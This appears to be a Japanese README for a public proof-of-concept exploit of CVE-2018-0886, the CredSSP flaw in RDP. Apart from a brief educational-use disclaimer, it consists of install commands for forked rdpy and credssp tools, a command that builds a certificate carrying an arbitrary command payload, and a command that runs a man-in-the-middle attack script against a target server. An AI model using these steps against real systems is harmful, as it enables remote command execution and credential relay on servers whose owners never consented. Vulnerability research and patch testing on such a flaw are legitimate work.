
これはCVE-2018-0886を悪用するためのPoCコードです。教育目的のみで使用してください。 これはrdpyプロジェクト(https://github.com/preempt/rdpy)のフォークに依存しており、credsspリレーも可能にします。
著者: Eyal Karni, Preempt [email protected]
Ubuntu 14を使用している場合は、installファイルを確認してください。 これはUbuntu 16.04でテストされています。
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
任意のドメインからサーバー認証に適した証明書をエクスポートします。 (これはRDPに使用されます https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))
脆弱性を悪用する(ペイロードを含む)証明書を生成するには、次を使用します:
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
(ExportedCert は手順1でエクスポートした証明書です。 exploitc.pem と exploitk.pem は、それぞれ生成された証明書と秘密鍵です。)
攻撃スクリプトを実行するには:
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
詳細はスクリプトの使用法セクション(--help)にあります。